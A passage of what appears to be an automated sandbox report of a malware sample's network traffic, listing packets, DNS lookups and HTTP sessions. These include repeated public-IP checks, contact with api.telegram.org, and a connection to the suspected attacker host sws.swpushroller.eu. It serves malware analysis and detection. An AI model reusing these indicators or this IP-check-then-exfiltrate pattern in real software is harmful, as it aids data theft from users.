                                                                                                                      Nov 10, 2024 21:44:07.288480043 CET4974180192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:07.847524881 CET44349742188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:07.850749016 CET49742443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:07.850774050 CET44349742188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:07.997684002 CET44349742188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:07.997756004 CET44349742188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:07.997822046 CET49742443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:07.998159885 CET49742443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:08.012522936 CET4974380192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:08.017496109 CET8049743193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:08.017553091 CET4974380192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:08.017652988 CET4974380192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:08.022625923 CET8049743193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:08.872978926 CET8049743193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:08.874183893 CET49744443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:08.874222040 CET44349744188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:08.874288082 CET49744443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:08.874556065 CET49744443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:08.874568939 CET44349744188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:08.913443089 CET4974380192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:09.490633011 CET44349744188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:09.492537975 CET49744443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:09.492568970 CET44349744188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:09.647711039 CET44349744188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:09.647793055 CET44349744188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:09.648097992 CET49744443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:09.648360014 CET49744443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:09.651066065 CET4974380192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:09.652179956 CET4974580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:09.656126976 CET8049743193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:09.656189919 CET4974380192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:09.656941891 CET8049745193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:09.657007933 CET4974580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:09.657079935 CET4974580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:09.661796093 CET8049745193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:10.668015003 CET8049745193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:10.675591946 CET49746443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:10.675611973 CET44349746188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:10.675694942 CET49746443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:10.710268021 CET4974580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:10.713275909 CET49746443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:10.713285923 CET44349746188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:10.895401955 CET8049745193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:10.895452976 CET4974580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:11.494427919 CET44349746188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:11.496305943 CET49746443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:11.496330023 CET44349746188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:11.687150955 CET44349746188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:11.687335968 CET44349746188.114.97.3192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:11.687391996 CET49746443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:11.687638998 CET49746443192.168.2.4188.114.97.3
                                                                                                                      Nov 10, 2024 21:44:11.716125965 CET4974580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:11.721272945 CET8049745193.122.6.168192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:11.721404076 CET4974580192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:11.724205017 CET49747443192.168.2.4149.154.167.220
                                                                                                                      Nov 10, 2024 21:44:11.724257946 CET44349747149.154.167.220192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:11.724334002 CET49747443192.168.2.4149.154.167.220
                                                                                                                      Nov 10, 2024 21:44:11.724695921 CET49747443192.168.2.4149.154.167.220
                                                                                                                      Nov 10, 2024 21:44:11.724745989 CET44349747149.154.167.220192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:12.587985039 CET44349747149.154.167.220192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:12.588072062 CET49747443192.168.2.4149.154.167.220
                                                                                                                      Nov 10, 2024 21:44:12.591583967 CET49747443192.168.2.4149.154.167.220
                                                                                                                      Nov 10, 2024 21:44:12.591597080 CET44349747149.154.167.220192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:12.591845989 CET44349747149.154.167.220192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:12.593555927 CET49747443192.168.2.4149.154.167.220
                                                                                                                      Nov 10, 2024 21:44:12.639341116 CET44349747149.154.167.220192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:12.837917089 CET44349747149.154.167.220192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:12.837980986 CET44349747149.154.167.220192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:12.838545084 CET49747443192.168.2.4149.154.167.220
                                                                                                                      Nov 10, 2024 21:44:12.842762947 CET49747443192.168.2.4149.154.167.220
                                                                                                                      Nov 10, 2024 21:44:19.180291891 CET4974180192.168.2.4193.122.6.168
                                                                                                                      Nov 10, 2024 21:44:19.326093912 CET4975480192.168.2.4141.98.10.88
                                                                                                                      Nov 10, 2024 21:44:19.331139088 CET8049754141.98.10.88192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:19.331226110 CET4975480192.168.2.4141.98.10.88
                                                                                                                      Nov 10, 2024 21:44:19.331846952 CET4975480192.168.2.4141.98.10.88
                                                                                                                      Nov 10, 2024 21:44:19.336585999 CET4975480192.168.2.4141.98.10.88
                                                                                                                      Nov 10, 2024 21:44:19.336664915 CET8049754141.98.10.88192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:19.341839075 CET8049754141.98.10.88192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:19.341850996 CET8049754141.98.10.88192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:19.341866970 CET8049754141.98.10.88192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:19.341876030 CET8049754141.98.10.88192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:19.341886044 CET8049754141.98.10.88192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:19.341896057 CET8049754141.98.10.88192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:19.341903925 CET8049754141.98.10.88192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:19.341916084 CET8049754141.98.10.88192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:20.200763941 CET8049754141.98.10.88192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:20.257143974 CET4975480192.168.2.4141.98.10.88
                                                                                                                      Nov 10, 2024 21:44:25.343307018 CET8049754141.98.10.88192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:25.343379974 CET4975480192.168.2.4141.98.10.88
                                                                                                                      Nov 10, 2024 21:45:51.694895029 CET4975480192.168.2.4141.98.10.88
                                                                                                                      Nov 10, 2024 21:45:52.040015936 CET4975480192.168.2.4141.98.10.88
                                                                                                                      Nov 10, 2024 21:45:52.741564035 CET4975480192.168.2.4141.98.10.88
                                                                                                                      Nov 10, 2024 21:45:53.946502924 CET4975480192.168.2.4141.98.10.88
                                                                                                                      Nov 10, 2024 21:45:56.352565050 CET4975480192.168.2.4141.98.10.88
                                                                                                                      Nov 10, 2024 21:46:01.241769075 CET4975480192.168.2.4141.98.10.88
                                                                                                                      Nov 10, 2024 21:46:10.944941998 CET4975480192.168.2.4141.98.10.88
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Nov 10, 2024 21:43:55.655762911 CET6502053192.168.2.41.1.1.1
                                                                                                                      Nov 10, 2024 21:43:55.662587881 CET53650201.1.1.1192.168.2.4
                                                                                                                      Nov 10, 2024 21:43:57.645832062 CET6251953192.168.2.41.1.1.1
                                                                                                                      Nov 10, 2024 21:43:57.654247046 CET53625191.1.1.1192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:11.716831923 CET6145853192.168.2.41.1.1.1
                                                                                                                      Nov 10, 2024 21:44:11.723701000 CET53614581.1.1.1192.168.2.4
                                                                                                                      Nov 10, 2024 21:44:19.298806906 CET5589153192.168.2.41.1.1.1
                                                                                                                      Nov 10, 2024 21:44:19.324453115 CET53558911.1.1.1192.168.2.4
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Nov 10, 2024 21:43:55.655762911 CET192.168.2.41.1.1.10x843bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                      Nov 10, 2024 21:43:57.645832062 CET192.168.2.41.1.1.10x7399Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                      Nov 10, 2024 21:44:11.716831923 CET192.168.2.41.1.1.10x4edeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                      Nov 10, 2024 21:44:19.298806906 CET192.168.2.41.1.1.10x5180Standard query (0)sws.swpushroller.euA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Nov 10, 2024 21:43:55.662587881 CET1.1.1.1192.168.2.40x843bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 10, 2024 21:43:55.662587881 CET1.1.1.1192.168.2.40x843bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                      Nov 10, 2024 21:43:55.662587881 CET1.1.1.1192.168.2.40x843bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                      Nov 10, 2024 21:43:55.662587881 CET1.1.1.1192.168.2.40x843bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                      Nov 10, 2024 21:43:55.662587881 CET1.1.1.1192.168.2.40x843bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                      Nov 10, 2024 21:43:55.662587881 CET1.1.1.1192.168.2.40x843bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                      Nov 10, 2024 21:43:57.654247046 CET1.1.1.1192.168.2.40x7399No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                      Nov 10, 2024 21:43:57.654247046 CET1.1.1.1192.168.2.40x7399No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                      Nov 10, 2024 21:44:11.723701000 CET1.1.1.1192.168.2.40x4edeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                      Nov 10, 2024 21:44:19.324453115 CET1.1.1.1192.168.2.40x5180No error (0)sws.swpushroller.eu141.98.10.88A (IP address)IN (0x0001)false
                                                                                                                      • reallyfreegeoip.org
                                                                                                                      • api.telegram.org
                                                                                                                      • checkip.dyndns.org
                                                                                                                      • sws.swpushroller.eu
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.449730193.122.6.168807288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 10, 2024 21:43:55.672642946 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 10, 2024 21:43:56.497616053 CET323INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:43:56 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 106
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 20317b5b314a933176c36233a996fd79
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
                                                                                                                      Nov 10, 2024 21:43:56.509068966 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 10, 2024 21:43:56.752751112 CET323INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:43:56 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 106
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 1b8b90f9322fbcac88e5c2b52d4ac797
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
                                                                                                                      Nov 10, 2024 21:43:58.689374924 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 10, 2024 21:43:59.083235025 CET323INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:43:58 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 106
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 3aed71296d2a3a7b3b39d1ace1497017
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.449733193.122.6.168807288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 10, 2024 21:43:59.870970011 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 10, 2024 21:44:00.712590933 CET323INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:00 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 106
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: cacd71e7c7b824b236d645020df93855
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.449735193.122.6.168807288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 10, 2024 21:44:01.499329090 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 10, 2024 21:44:02.342360973 CET323INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:02 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 106
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 4925bfb92058670c02d12dc19fec389c
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.449737193.122.6.168807288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 10, 2024 21:44:03.160031080 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 10, 2024 21:44:04.001070976 CET323INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:03 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 106
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 80d6a259fc47e7c3df2ef17c68f20e19
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.449739193.122.6.168807288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 10, 2024 21:44:04.767249107 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 10, 2024 21:44:05.635868073 CET323INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:05 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 106
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 64a6ee6587319001160d0d232ed39cc7
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.449741193.122.6.168807288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 10, 2024 21:44:06.403038025 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Nov 10, 2024 21:44:07.237343073 CET323INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:07 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 106
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: b808d1f6a157ee3020cc4680baa0c779
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.449743193.122.6.168807288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 10, 2024 21:44:08.017652988 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 10, 2024 21:44:08.872978926 CET323INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:08 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 106
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 7d0e546291d57ff93b2a8f9c7b7350bf
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.449745193.122.6.168807288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 10, 2024 21:44:09.657079935 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 10, 2024 21:44:10.668015003 CET323INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:10 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 106
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 9b8e5dbd4eaaede64f780bb08500335d
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
                                                                                                                      Nov 10, 2024 21:44:10.895401955 CET323INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:10 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 106
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 9b8e5dbd4eaaede64f780bb08500335d
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.449754141.98.10.88807288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
